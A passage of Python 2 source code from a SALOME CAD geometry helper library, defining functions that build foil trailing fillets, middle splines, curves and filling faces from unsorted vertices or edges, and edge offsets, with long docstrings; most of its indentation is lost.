#-
# Get the local thickness slope
local_thickness = geompy.BasicProperties(tmp_edge)[0]
delta_x = geompy.BasicProperties(cut_normal)[0]
thickness_slope = local_thickness / delta_x
thickness_slope_list.append(thickness_slope)
#-
trailing_vertex_list.append(vertex)
cut_normal_list.append(cut_normal)
#-
#-
final_wire = wire
# Create trailing fillings
for i in range(len(trailing_vertex_list)):# For each trailing vertex...
trailing_vertex = trailing_vertex_list[i]
cut_normal = cut_normal_list[i]
thickness_slope = thickness_slope_list[i]
# Create the cutting plane
cutting_plane = geompy.MakePlane(trailing_vertex, cut_normal, cut_plane_size)
#-
# Cut the wire
cut_position = thick / thickness_slope
cutting_plane = geompy.MakeTranslationVectorDistance(cutting_plane, cut_normal, cut_position)
extrusion = geompy.MakePrismVecH(cutting_plane, cut_normal, - infinite_distance)
cut_wire = geompy.MakeCut(final_wire, extrusion)
#-
# Close the cut wire
boundary_vertex_list = GetBoundaryVertexes(cut_wire, add = False, single = False)
closing_edge = geompy.MakeEdge(boundary_vertex_list[0], boundary_vertex_list[1])
try:
closed_wire = geompy.MakeWire([cut_wire, closing_edge])
except:
print "[X] A \"make wire\" operation failed on a rebuilt wire."
if add == True:
AddToStudy([cut_wire, closing_edge], "ProblematicShapes")
return [cut_wire, closing_edge]
#-
# Get the trailing vertexes IDs
boundary_vertex_id_list = []
for boundary_vertex in boundary_vertex_list:
boundary_vertex_id = geompy.GetSubShapeID(closed_wire, boundary_vertex)
boundary_vertex_id_list.append(boundary_vertex_id)
#-
# Make first fillets
radius_1 = thick / 4.0
radius_2 = thick / 3.0
try:
fillet_1 = geompy.MakeFillet1D(closed_wire, radius_1, boundary_vertex_id_list, doIgnoreSecantVertices = False)
fillet_2 = geompy.MakeFillet1D(closed_wire, radius_2, boundary_vertex_id_list, doIgnoreSecantVertices = False)
except:
print "[X] Fillet operations failed on the cut wire."
if add == True:
AddToStudy(closed_wire, "ProblematicShape")
return closed_wire
#-
# Get the fillets trailing edge lengths
trailing_edge_middle_vertex = geompy.MakeVertexOnCurve(closing_edge, 0.5)
trailing_edge_1 = geompy.GetShapesNearPoint(fillet_1, trailing_edge_middle_vertex, geompy.ShapeType["EDGE"])
trailing_edge_2 = geompy.GetShapesNearPoint(fillet_2, trailing_edge_middle_vertex, geompy.ShapeType["EDGE"])
trailing_edge_thickness_1 = geompy.BasicProperties(trailing_edge_1)[0]
trailing_edge_thickness_2 = geompy.BasicProperties(trailing_edge_2)[0]
#-
# Deduce a better fillet radius
trailing_edge_thickness_slope = (trailing_edge_thickness_2 - trailing_edge_thickness_1) / (radius_2 - radius_1)
radius_3 = (radius_1 * trailing_edge_thickness_slope - trailing_edge_thickness_1) / trailing_edge_thickness_slope
#-
# Create the final fillet
fillet_3 = geompy.MakeFillet1D(closed_wire, radius_3 * .99, boundary_vertex_id_list, doIgnoreSecantVertices = False)
#-
# Remove the fillet trailing edge
trailing_edge_3 = geompy.GetShapesNearPoint(fillet_3, trailing_edge_middle_vertex, geompy.ShapeType["EDGE"])
trailing_edge_thickness_3 = geompy.BasicProperties(trailing_edge_3)[0]
final_wire = geompy.ProcessShape(fillet_3, ["DropSmallEdges"], ["DropSmallEdges.Tolerance3d"], [str(trailing_edge_thickness_3 * 1.1)])
#-
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(final_wire, "FoilWithTrailingFillet")
return final_wire
#-
mftf = MakeFoilTrailingFillets
def MakeMiddleSpline( edges = [None], np = 20, cor = False, single = True, add = True, dim = 1 ):
"""
Description:
Creates a middle spline between two edges.
Arguments:
# edges
Description: The edges between which to build the middle edge.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 10
# cor
Description: If equals True, the edge orientation is automatically corrected.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "MiddleSpline (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "MiddleSpline (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge
Number: 1
Name: "MiddleSpline"
Conditions of use:
Input edges should not touch each other.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(edges, list) == False: print "[X] The second argument (edges) should be an array."; return
if dim > 1: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
edges = GetGUISelection(edges)
edges = GetObject(edges)
#-
# Check the input shape existence
if "error" in edges or None in edges: return
#-
# Check the number of selected objects
if len(edges) != 2:
print "[X] Two shapes should be selected."
return
#-
else:# All checks done
# Get the sub-shapes
edges = GetSubShapes(edges)
#-
# Get the offset edge sense
reverse_parameter = False
if cor == True:
linking_edges = [
geompy.MakeEdge(edges[0][0][0], edges[1][0][0]),
geompy.MakeEdge(edges[0][0][0], edges[1][0][1])
]
linking_edge_lengths = [
geompy.BasicProperties(linking_edges[0])[0],
geompy.BasicProperties(linking_edges[1])[0]
]
if linking_edge_lengths[0] > linking_edge_lengths[1]:
reverse_parameter = True
#-
# Create the points
edge_vertexes = [[], []]
for parameter in [float(i) / (np - 1) for i in range(np)]:
edge_vertexes[0].append(geompy.MakeVertexOnCurve(edges[0][-1], parameter))
if reverse_parameter == True:
parameter = 1.0 - parameter
edge_vertexes[1].append(geompy.MakeVertexOnCurve(edges[1][-1], parameter))
#-
# Get the middle spline vertexes
nb_vertexes = len(edge_vertexes[0])
middle_vertexes = []
for i in range(nb_vertexes):
spline = geompy.MakeEdge(edge_vertexes[0][i], edge_vertexes[1][i])
middle_vertexes.append(geompy.MakeVertexOnCurve(spline, 0.5))
#-
if dim == 0:# If the output dimension is 0...
to_return = middle_vertexes
to_return_name = "MiddleSpline (Vertex)"
if single == True:
# Create the vertex compound
middle_vertex_compound = geompy.MakeCompound(middle_vertexes)
#-
to_return = middle_vertex_compound
to_return_name = "MiddleSpline (Vertexes)"
else:
# Create the middle spline
middle_spline = geompy.MakeInterpol(middle_vertexes)
#-
to_return = middle_spline
to_return_name = "MiddleSpline"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mms = MakeMiddleSpline
def MakeCurveFromUnsortedVertexes( compound_and_start = [None], close = False, poly = False, single = True, add = True, infa = False, dim = 1):
"""
Description:
Creates a spline using a set of vertexes in random order, starting from a given vertex.
Arguments:
# compound_and_start
Description: The compound of vertexes describing the curve and the start vertex. For a closed curve, the start vertex is optional.
Type: List of 1 Compound of Vertexes + 1 Vertex
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# close
Description: Defines if the curve has to be closed or not.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# poly
Description: If True, the output curve is a wire composed of straights edges. If False, the output curve is a single smooth edge.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 0
"single" value: False
Type: Vertex
Number: n
Name: "CurveFromUnstortedVertexes (Vertex)"
"dim" value: 0
"single" value: True
Type: Compound or Vertexes
Number: 1
Name: "CurveFromUnstortedVertexes (Vertexes)"
"dim" value: 1
"single" value: -
Type: Edge or Wire
Number: 1
Name: "CurveFromUnstortedVertexes"
Conditions of use:
-
"""
if dim not in [0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
if isinstance(compound_and_start, list) == False: print "[X] The first argument (compound_and_start) should be an array."; return
# Get the input shape(s)
compound_and_start = GetGUISelection(compound_and_start)
compound_and_start = GetObject(compound_and_start)
#-
# Check the input shape existence
if "error" in compound_and_start or None in compound_and_start: return
#-
# Check the number of selected objects
if len(compound_and_start) > 2:
print "[X] No more than two objects should be selected."
return
#-
# Distinguish input shapes
compound = None
start = None
for object in compound_and_start:
nb_vertexes = int(geompy.WhatIs(object).split("\n")[1].split(": ")[1])
if nb_vertexes == 1:
start = object
elif nb_vertexes > 1:
compound = object
if compound == None:
print "[X] None of selected objects is a compound containing several vertexes."
return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
resting_vertexes = compound[0]
nb_vertexes = len(resting_vertexes)
#-
# Get the start vertex
if start == None:
vertex_index = 0
else:
min_distance = 1e99
vertex_index = 0
for i in range(nb_vertexes):
vertex = resting_vertexes[i]
distance = geompy.MinDistance(vertex, start)
if distance < min_distance:
min_distance = distance
vertex_index = i
i += 1
#-
# Sort the vertexes
sorted_vertexes = []
for i in range(nb_vertexes):
vertex = resting_vertexes[vertex_index]
sorted_vertexes.append(vertex)
del resting_vertexes[vertex_index]
min_distance = 1e99
j = 0
for resting_vertex in resting_vertexes:
distance = geompy.MinDistance(resting_vertex, vertex)
if distance < min_distance:
min_distance = distance
vertex_index = j
j += 1
#-
if dim == 0:
to_return = sorted_vertexes
to_return_name = "CurveFromUnstortedVertexes (Vertex)"
if single == True:
compound = geompy.MakeCompound(to_return)
to_return = compound
to_return_name = "CurveFromUnstortedVertexes (Vertexes)"
else:
# Create the curve
if poly == True:
curve = geompy.MakePolyline(sorted_vertexes, close)
else:
curve = geompy.MakeInterpol(sorted_vertexes, close)
#-
to_return = curve
to_return_name = "CurveFromUnstortedVertexes"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mcfuv = MakeCurveFromUnsortedVertexes
def MakeEllipticalFilling( center, guides = [None], np = 20, parallel = False, single = True, add = True, dim = 2 ):
"""
Description:
Creates a filling face having all its section being elliptical.
Arguments:
# center
Description: The central edge of the elliptical filling.
Type: Edge
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# guides
Description: The guiding edges.
Type: List of 2 Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 10
# parallel
Description: If equals True, the elliptical sections of the filling are forced to be parallel.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 2
Returned Values:
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "EllipticalFilling (Edge)"
"dim" value: 1
"single" value: True
Type: Compound of Edges
Number: 1
Name: "EllipticalFilling (Edges)"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "EllipticalFilling"
Conditions of use:
Triangles formed by vertexes taken at a same position on the center and guiding edges should be always rectangle.
"""
if isinstance(guides, list) == False: print "[X] The second argument (guides) should be an array."; return
if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
guides = GetGUISelection(guides)
guides = GetObject(guides)
#-
# Check the input shape existence
if "error" in guides or None in guides: return
#-
# Check the number of selected objects
if len(guides) != 2:
print "[X] Two guiding edge should be selected."
return
#-
# Get the input shape(s)
[guide1, guide2, center] = GetObject(guides + [center], "GEOM")
#-
# Check the input shape characteritics
for object in [guide1, guide2, center]:
nb_edges = int(geompy.WhatIs(object).split("\n")[2].split(": ")[1])
if nb_edges != 1:
print "[X] Only edges should be selected."
return
#-
if False: pass
else:# All checks done
# Create ellipses
ellipses = []
if parallel == True:
# Get the cutting plane
center_edge_first_point = geompy.MakeVertexOnCurve(center, 0)
center_edge_last_point = geompy.MakeVertexOnCurve(center, 1)
cutting_plane = geompy.MakePlane(center_edge_first_point, center, 100000)
#-
for parameter in [n / float(np - 1) for n in range(np)]:
if parameter == 0:
local_guide1 = geompy.MakeVertexOnCurve(guide1, 0)
local_guide2 = geompy.MakeVertexOnCurve(guide2, 0)
local_center = center_edge_first_point
elif parameter == 1:
local_guide1 = geompy.MakeVertexOnCurve(guide1, 1)
local_guide2 = geompy.MakeVertexOnCurve(guide2, 1)
local_center = center_edge_last_point
else:
# Get the local center
local_center = geompy.MakeVertexOnCurve(center, parameter)
#-
# Translate the cutting plane
translated_cutting_plane = geompy.MakeTranslationTwoPoints(cutting_plane, center_edge_first_point, local_center)
translated_cutting_plane_wire = geompy.SubShapeAll(translated_cutting_plane, geompy.ShapeType["WIRE"])[0]
#-
# Get the local guide point 1
partition = geompy.MakePartition([translated_cutting_plane], [guide1], Limit = geompy.ShapeType["VERTEX"])
vertexes = geompy.SubShapeAll(partition, geompy.ShapeType["VERTEX"])
max_distance = 0
local_guide1 = None
for vertex in vertexes:
distance = geompy.MinDistance(vertex, translated_cutting_plane_wire)
if distance > max_distance:
local_guide1 = vertex
max_distance = distance
#-
# Get the local guide point 2
partition = geompy.MakePartition([translated_cutting_plane], [guide2], Limit = geompy.ShapeType["VERTEX"])
vertexes = geompy.SubShapeAll(partition, geompy.ShapeType["VERTEX"])
max_distance = 0
local_guide2 = None
for vertex in vertexes:
distance = geompy.MinDistance(vertex, translated_cutting_plane_wire)
if distance > max_distance:
local_guide2 = vertex
max_distance = distance
#-
# Create the local ellipse
ellipse = geompy.MakeArcOfEllipse(local_center, local_guide1, local_guide2)
#-
# Add the local ellipse to the list
ellipses.append(ellipse)
#-
#-
else:
for parameter in [n / float(np - 1) for n in range(np)]:
# Get the local points
local_guide1 = geompy.MakeVertexOnCurve(guide1, parameter)
local_guide2 = geompy.MakeVertexOnCurve(guide2, parameter)
local_center = geompy.MakeVertexOnCurve(center, parameter)
#-
# Create the local ellipse
ellipse = geompy.MakeArcOfEllipse(local_center, local_guide1, local_guide2)
#-
# Add the local ellipse to the list
ellipses.append(ellipse)
#-
# Put the ellipses into a compound
ellipse_compound = geompy.MakeCompound(ellipses)
#-
if dim == 1:
to_return = ellipses
to_return_name = "EllipticalFilling (Edge)"
if single == True:
to_return = ellipse_compound
to_return_name = "EllipticalFilling (Edges)"
else:
# Create the filling
elliptical_filling = geompy.MakeFilling(ellipse_compound, theMinDeg = 10, theMaxDeg = 15, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
to_return = elliptical_filling
to_return_name = "EllipticalFilling"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mef = MakeEllipticalFilling
def MakeFillingFromUnsortedEdges( compound_and_start = [None], single = True, add = True, infa = False, dim = 2 ):
"""
Description:
Creates a filling face using a set of edges in a random order, starting from a given vertex position.
Arguments:
# compound_and_start
Description: The compound of edges and the start vertex.
Type: List of 1 Compound of Edges+ 1 Vertex
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 2
Returned Values:
"dim" value: 1
"single" value: False
Type: Edge
Number: n
Name: "FillingFromUnstortedEdges (Edge)"
"dim" value: 1
"single" value: True
Type: Compound of Edges
Number: 1
Name: "FillingFromUnstortedEdges (Edges)"
"dim" value: 2
"single" value: -
Type: Face
Number: 1
Name: "FillingFromUnstortedEdges"
Conditions of use:
-
"""
if isinstance(compound_and_start, list) == False: print "[X] The first argument (compound_and_start) should be an array."; return
if dim == 0 or dim == 3: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
compound_and_start = GetGUISelection(compound_and_start)
compound_and_start = GetObject(compound_and_start)
#-
# Check the input shape existence
if "error" in compound_and_start or None in compound_and_start: return
#-
# Check the number of selected objects
if len(compound_and_start) > 2:
print "[X] No more than two objects should be selected."
return
#-
# Distinguish input shapes
compound = None
start = None
for object in compound_and_start:
nb_vertexes = int(geompy.WhatIs(object).split("\n")[1].split(": ")[1])
nb_edges = int(geompy.WhatIs(object).split("\n")[2].split(": ")[1])
if nb_vertexes == 1:
start = object
elif nb_edges > 1:
compound = object
compound = GetObject(compound, "GEOM")
start = GetObject(start, "GEOM")
if compound == None:
print "[X] None of selected objects is a compound containing several edges."
return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
resting_edges = compound[1]
nb_edges = len(resting_edges)
#-
# Get the start edge
if start == None:
edge_index = 0
else:
min_distance = 1e99
edge_index = 0
for i in range(nb_edges):
edge = resting_edges[i]
distance = geompy.MinDistance(edge, start)
if distance < min_distance:
min_distance = distance
edge_index = i
i += 1
#-
# Sort the edges
sorted_edges = []
for i in range(nb_edges):
edge = resting_edges[edge_index]
sorted_edges.append(edge)
del resting_edges[edge_index]
min_distance = 1e99
j = 0
for resting_edge in resting_edges:
distance = geompy.MinDistance(resting_edge, edge)
if distance < min_distance:
min_distance = distance
edge_index = j
j += 1
#-
# Create the edge compound
filling_edge_compound = geompy.MakeCompound(sorted_edges)
#-
if dim == 1:
to_return = sorted_edges
to_return_name = "FillingFromUnstortedEdges (Edge)"
if single == True:
to_return = filling_edge_compound
to_return_name = "FillingFromUnstortedEdges (Edges)"
else:
# Create the filling
filling = geompy.MakeFilling(filling_edge_compound, theMinDeg = 10, theMaxDeg = 15, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
to_return = filling
to_return_name = "FillingFromUnstortedEdges"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mffue = MakeFillingFromUnsortedEdges
def MakeFoilFromUnsortedVertexes( compound = None, coef = 1.5, coef2 = 0.02, strat = "grow", poly = False, angle = 60, add = True, infa = False ):
"""
Description:
Makes a foil wire from an unsorted compound of vertexes.
Arguments:
# compound
Description: The compound of vertexes describing the foil.
Type: List of 1 Compound of Vertexes + 1 Vertex
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# coef
Description: Coefficient influencing the search distance: search_distance = coef * mean_distance_between_vertexes
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1.5
# coef2
Description: When the foil curvature is very low, some vertexes can be skipped. This coefficient has an influence on skipped vertex detection. Lower it is, finer is the detection.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 0.02
# strat
Description: The search distance strategy. If equals "grow", the search distance increases until at least one nearby vertex is seen. If equals "stop", the algorithm stops when no nearby vertex is seen within the search distance.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "grow"
# poly
Description: If True, the output wire is made of straights edges. If False, the output wire is made of smooth edge.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# angle
Description: The feature angle in degrees.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 60
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Wire
Number: 1
Name: "FoilFromUnsortedVertexes"
Conditions of use:
The input vertex compound must be planar.
"""
input_shape = compound
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Make this function recursive
if isinstance(input_shape, list):
return_list = []
for sub_object in input_shape:
return_list.append(MakeFoilFromUnsortedVertexes(sub_object, coef, coef2, strat, poly, angle, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
# Check the input shape type
nb_vertexes = geompy.NumberOfSubShapes(input_shape, geompy.ShapeType["VERTEX"])
if nb_vertexes < 2:
print "[X] The first argument (compound) should contain more than one vertex."; return
#-
# Set father object
father = None
if infa == True: father = input_shape
#-
compound = input_shape
if False: pass
else:# All checks done
feature_angle = angle
# Get the sub-shapes
compound = GetSubShapes(compound)
resting_vertexes = compound[0]
nb_vertexes = len(resting_vertexes)
#-
# Get the biggest dimension of the compound
[x_min, x_max, y_min, y_max, z_min, z_max ] = geompy.BoundingBox(compound[-1])
x = (x_min + x_max) / 2.0
y = (y_min + y_max) / 2.0
z = (z_min + z_max) / 2.0
center = geompy.MakeVertex(x, y, z)
farest_vertex_1 = None
farest_vertex_1_id = None
max_distance = 0
i = 0
for vertex in resting_vertexes:
distance = geompy.MinDistance(vertex, center)
if distance > max_distance:
farest_vertex_1 = vertex
farest_vertex_1_id = i
max_distance = distance
i += 1
farest_vertex_2 = None
max_distance = 0
for vertex in resting_vertexes:
distance = geompy.MinDistance(vertex, farest_vertex_1)
if distance > max_distance:
farest_vertex_2 = vertex
max_distance = distance
biggest_dimension = geompy.MinDistance(farest_vertex_1, farest_vertex_2)
#-
# Define the search distance
nb_profile_vertexes = len(resting_vertexes)
mean_distance_between_vertexes = 2.0 * biggest_dimension / nb_profile_vertexes
search_distance = coef * mean_distance_between_vertexes
initial_search_distance = search_distance
#-
# Initialize the sorted vertex list
sorted_vertexes = [resting_vertexes[farest_vertex_1_id]]
del resting_vertexes[farest_vertex_1_id]
#-
# As long as there are non sorted vertexes...
while len(resting_vertexes) > 0:
last_vertex = sorted_vertexes[-1]
vertex_to_delete_ids = []
# Get vertexes being relatively close
closest_vertexes = []
closest_vertex_indexes = []
i = 0
for resting_vertex in resting_vertexes:
distance = geompy.MinDistance(resting_vertex, last_vertex)
if distance < search_distance:
closest_vertexes.append(resting_vertex)
closest_vertex_indexes.append(i)
i += 1
if len(closest_vertexes) == 0:
if strat == "grow":
search_distance *= 1.1
continue
else:# "stop"
break
search_distance = initial_search_distance
#-
# Get the next vertex
best_vertex = None
if len(sorted_vertexes) == 1:
i = 0
min_distance = 1e99
for vertex in closest_vertexes:
distance = geompy.MinDistance(vertex, last_vertex)
if distance < min_distance:
best_vertex = vertex
best_vertex_index = i
min_distance = distance
i += 1
else:
previous_vertex = sorted_vertexes[ - 2]
last_vector = geompy.MakeVector(previous_vertex, last_vertex)
i = 0
min_angle = 1e99
for vertex in closest_vertexes:
vector = geompy.MakeVector(last_vertex, vertex)
angle = geompy.GetAngleVectors(last_vector, vector)
if angle < min_angle:
best_vertex = vertex
best_vertex_index = i
min_angle = angle
i += 1
#-
# Remove it from the resting vertex list
sorted_vertexes.append(best_vertex)
vertex_to_delete_ids.append(closest_vertex_indexes[best_vertex_index])
#-
# Check if the segment covers other vertexes
segment = geompy.MakeEdge(last_vertex, best_vertex)
segment_length = geompy.BasicProperties(segment)[0]
tol = segment_length * coef2
i = 0
for vertex in closest_vertexes:
if i != best_vertex_index:
distance = geompy.MinDistance(vertex, segment)
if distance <= tol:
vertex_to_delete_ids.append(closest_vertex_indexes[i])
i += 1
#-
# Delete the suitable vertexes from the resting vertex list
# http: / / stackoverflow.com / a / 28697246 / 2123808
for vertex_to_delete_id in sorted(vertex_to_delete_ids, reverse = True):
del resting_vertexes[vertex_to_delete_id]
#-
#-
# Create the wire
if poly == False:
# Look for a feature angle
v1 = sorted_vertexes[0]
v2 = sorted_vertexes[1]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
last_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
first_vertex_indice = None
nb_sorted_vertexes = len(sorted_vertexes)
for i in range(nb_sorted_vertexes):
if i > 0:
next_i = i + 1
if next_i == nb_sorted_vertexes:
next_i = 0
v1 = sorted_vertexes[i]
v2 = sorted_vertexes[next_i]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
new_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
angle = geompy.GetAngle(last_vector, new_vector)
if angle >= feature_angle:
first_vertex_indice = i
break
last_vector = new_vector
if first_vertex_indice == None:
shift = 0
first_vertex = sorted_vertexes[0]
else:
shift = first_vertex_indice
first_vertex = sorted_vertexes[first_vertex_indice]
#-
# Create curves
index_1 = shift
if index_1 >= nb_sorted_vertexes:
index_1 -= nb_vertexes
index_2 = shift + 1
if index_2 >= nb_sorted_vertexes:
index_2 -= nb_vertexes
v1 = sorted_vertexes[index_1]
v2 = sorted_vertexes[index_2]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
last_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
curves = []
curve_vertexes = [first_vertex]
for i in range(nb_sorted_vertexes):
i = i + shift
if i > shift:
if i >= nb_sorted_vertexes:
i -= nb_sorted_vertexes
next_i = i + 1
if next_i == nb_sorted_vertexes:
next_i = 0
v1 = sorted_vertexes[i]
v2 = sorted_vertexes[next_i]
[dx, dy, dz] = geompy.MinDistanceComponents(v1, v2)[1:4]
new_vector = geompy.MakeVectorDXDYDZ(dx, dy, dz)
angle = geompy.GetAngle(last_vector, new_vector)
if angle >= feature_angle:
curve_vertexes.append(v1)
curve = geompy.MakeInterpol(curve_vertexes)
curves.append(curve)
curve_vertexes = [v1]
else:
curve_vertexes.append(v1)
last_vector = new_vector
curve_vertexes.append(first_vertex)
curve = geompy.MakeInterpol(curve_vertexes)
curves.append(curve)
wire = geompy.MakeWire(curves)
#-
else:
wire = geompy.MakePolyline(sorted_vertexes, True)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(wire, "FoilFromUnsortedVertexes", father)
return wire
#-
mffuv = MakeFoilFromUnsortedVertexes
def MakeEdgeOffset( dist, edge = None, pos = [0, 1], face = None, plane = None, np = 20, curv = True, close = False, rebuild = True, tol = 1e-7, rev = False, single = True, add = True, infa = False, dim = 1 ):
    """
    Description:
        Creates an offset of an edge.
    Arguments:
        # dist
            Description: The offset distance. Must be a list to create a variable offset.
            Type: Float or List of Floats
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: -
        # edge
            Description: The input edge.
            Type: Edge
            GUI selection: yes
            Selection by name: yes
            Recursive: yes
            Default value: None
        # pos
            Description: The positions on the source edge (0 < pos < 1). Only necessary if the dist argument is a list.
            Type: List of Floats
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: [0,1]
        # face
            Description: See here.
            Type: Face
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: None
        # plane
            Description: See here. If the input edge is straight, the default plane is the OXY plane.
            Type: Face
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: None
        # np
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 20
        # curv
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # close
            Description: If equals True, the offset edge is linked to the source edge by two additional edges.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # rebuild
            Description: In case dim = 2, defines if the input edge has to be rebuilt in the same way than the offset edge.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # rev
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # single
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1
    Returned Values:
        "dim" value: 0
        "single" value: False
            Type: Vertex
            Number: n
            Name: "EdgeOffset (Vertex)"
        "dim" value: 0
        "single" value: True
            Type: Compound of Vertexes
            Number: 1
            Name: "EdgeOffset (Vertexes)"
        "dim" value: 1
        "single" value: False
            Type: Edge
            Number: 3
            Name: "ClosedEdgeOffset (Edge)"
        "dim" value: 1
        "single" value: True
            Type: Compound of Edges
            Number: 1
            Name: "EdgeOffset" or "ClosedEdgeOffset"
        "dim" value: 2
        "single" value: -
            Type: Face
            Number: 1
            Name: "EdgeOffset (Face)"
    Conditions of use:
        The input edge has to be open.
        In addition, if the input edge is straight, it is also necessary to set the face or the plane argument so as the function knows the offset direction
    """
    if dim not in [0, 1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
    # Get the input shape(s)
    edge = GetGUISelection(edge)
    [edge, face, plane] = GetObject([edge, face, plane])
    #-
